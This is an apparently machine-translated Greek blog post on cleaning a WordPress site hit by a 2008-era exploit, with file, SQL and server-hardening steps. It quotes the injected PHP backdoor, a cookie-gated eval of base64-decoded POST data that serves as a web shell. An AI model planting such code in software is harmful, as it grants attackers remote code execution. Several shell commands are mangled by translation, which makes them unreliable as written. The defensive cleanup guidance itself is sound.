Πριν διαβάσετε αυτό το μήνυμα, θα πρέπει να δείτε post εδώ, Για να καταλάβετε κάτι. :)
Το βρήκα σε πολλά αρχεία blog stealthsettings.com, κωδικούς παρόμοιους με αυτούς παρακάτω, οι οποίοι εμφανίστηκαν ως αποτέλεσμα του ιού με το κατόρθωμα του WordPress.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
Αν είναι πάνω από το αρχείο xmlrpc.php από νυσταγμένοςΑλλά σε μια grep διακομιστή, μπορείτε να δείτε ότι υπάρχουν πολύ λίγα του είδους του στον πηγαίο κώδικα.
Καθαρισμός μολυσμένων αρχείων:
Ooookkkk ...
1. Η καλύτερη λύση, αφού είχε στο CloudΚαι καθαριστεί η βάση δεδομένων είναι σε διαγράψετε αρχεία WordPress (μπορείτε να διατηρήσετε το wp-config.php και τα αρχεία που δεν σχετίζονται αυστηρά με την πλατφόρμα wp, αφού ελεγχθούν προσεκτικά) από το διακομιστή και να ανεβάσετε τα αυθεντικά από την έκδοση 2.5.1 (Κατά τη διάρκεια αυτής WP κάνει μια έκδοση αναβάθμισης :)) http://wordpress.org/download/ . Σκουπίστε συμπεριλαμβανομένων των αρχείων θέμα αν δεν εμπιστεύεστε ότι προσεκτικό έλεγχο τους.
Φαίνεται να έχουν επηρεαστεί και τα αρχεία από τα θέματα που δεν έχουν χρησιμοποιηθεί πριν για το blog και απλά αλλάζοντας το θέμα, δεν λύνει το πρόβλημα.
./andreea/wp-content/themes/default/index.php:
2. Αναζήτηση και να διαγράψετε όλα τα αρχεία που περιέχουν: * _new.php, _old.php *, * Jpgg, Giff *, * Pngg και το αρχείο wp-info.txt, αν υπάρχουν....
εύρημα. -όνομα "* _new.php"
εύρημα. -όνομα "* _old.php"
εύρημα. -όνομα "* .jpgg"
εύρημα. -όνομα "* _giff"
εύρημα. -όνομα "* _pngg"
εύρημα. -όνομα "wp-info.txt"
3. σε / Tmp , Αναζήτηση και να διαγράψετε φακέλους, όπως tmpYwbzT2
SQL Καθαρισμός :
1. στον πίνακα Πίνακα wp_options δείτε αν υπάρχει διαγράψετε τις γραμμές: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2. Όλα σε wp_options, παω σε active_plugins διαγράψετε και αν υπάρχει ένα plugin που καταλήγει σε μια από τις επεκτάσεις * _new.php, _old.php *, *. jpgg, *. GIFF, *. pngg ή αν κάποια άλλη επέκταση είναι ύποπτο, ελέγξτε προσεκτικά.
3. Στον Πίνακα wp_users, Δείτε αν υπάρχει ένας χρήστης που δεν έχει γράψει τίποτα στο δικαίωμά του, η στήλη user_nicename. Διαγράψτε αυτόν τον χρήστη, αλλά θυμηθείτε τον αριθμό στη στήλη ID. Αυτός ο χρήστης είναι πιθανό να χρησιμοποιήσει "WordPress«Περίπου user_login και φαίνεται να δημιουργείται στην 00: 00: 00 0000-00-00.
4. Πηγαίνετε στον πίνακα wp_usermeta και να διαγράψετε όλες τις γραμμές που ανήκουν ID παραπάνω.
Αφού ολοκληρώσετε αυτήν την εκκαθάριση sql, απενεργοποιήστε και, στη συνέχεια, ενεργοποιήστε οποιαδήποτε προσθήκη. (στο ιστολόγιο -> Πίνακας ελέγχου -> Πρόσθετα)
Secure Server:
1. Δείτε ποιες είναι οι κατάλογοι και τα αρχεία "εγγράψιμο»(chmod 777) και προσπαθήστε να βάλετε α chmod που δεν θα επιτρέπουν πλέον τη γραφή τους σε κανένα επίπεδο. (chmod 644, για παράδειγμα)
Εύρεση. -Perm-2-ls
2. Δείτε ποια αρχεία έχουν το σύνολο bit suid ή sgid . Εάν δεν χρησιμοποιήσετε αυτά τα αρχεία που τους chmod 0 ή να απεγκαταστήσετε το πακέτο που περιέχει. Είναι πολύ επικίνδυνο, επειδή εκτελούν προνόμια "ομάδα"Sau"ρίζα"Και δεν με κανονική προνόμια χρήστη να εκτελέσει αυτό το αρχείο.
find /-type f-perm-04000-ls
find /-type f-perm-02000-ls
3. Δείτε ποιες θύρες είναι ανοικτές και να προσπαθήσει να κλείσει ή να εξασφαλίσει αυτά που δεν χρησιμοποιούνται.
netstat-an | grep-i ακούστε
Σχετικά με αυτό. Βλέπω Απαγορεύονται Ορισμένα blogs de Google Search και άλλοι λένε "Καλά τους έκανε!!!" . Λοιπόν, θα το έκανα για αυτούς... αλλά τι λέτε αν η Google αρχίσει να απαγορεύει όλες οι περιοχές σχηματίζοντας ΕΙΝΑΙ SPAM και να θέσει Trojans (Trojan.Clicker.HTML) στα cookies;
1 σκέφτηκε για "WordPress Exploit – Καθαρισμός αρχείων ιών, ασφάλεια SQL και διακομιστή.”